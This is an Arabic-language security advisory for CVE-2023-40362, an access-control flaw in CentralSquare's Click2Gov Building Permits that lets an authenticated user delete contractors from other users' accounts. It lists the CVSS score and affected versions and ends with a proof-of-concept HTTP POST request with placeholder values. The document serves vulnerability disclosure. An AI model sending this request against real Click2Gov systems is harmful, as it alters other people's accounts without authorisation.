
CVE-2023-40362 تفاصيل الثغرة الأمنية وإثبات المفهوم
CVE-2023-40362 تفاصيل الثغرة وإثبات المفهوم.
تؤدي ثغرة التحكم في الوصول في تطبيق Click2Gov BP عبر المسار /Click2GovBP/mastercontractorlist.html إلى تمكين المستخدمين المصادَق عليهم من حذف المقاولين من حسابات مستخدمين آخرين باستخدام معرّف المستخدم الخاص بالضحية ومعلومات المقاول المطلوب حذفه.
وينجم ذلك عن فشل تطبيق الويب في التحقق من أن المستخدم مخوَّل لحذف المقاول من الحساب الذي تم تحديد معرّف المستخدم الخاص به.
البائع: CentralSquare
أُبلغ بواسطة: Ally Petitt
تاريخ الاكتشاف: 13 يونيو 2023
المنتجات المتأثرة: Click2Gov Building Permits (BP)
الإصدارات المتأثرة: قبل أكتوبر 2023
CVSS v3: 5.4 - متوسطة (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
يمكن إرسال طلب HTTP POST الموضح أدناه لحذف أحد المقاولين من حساب الضحية. يجب أن يكون رمز CSRF صالحًا لكي يعمل ذلك.
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>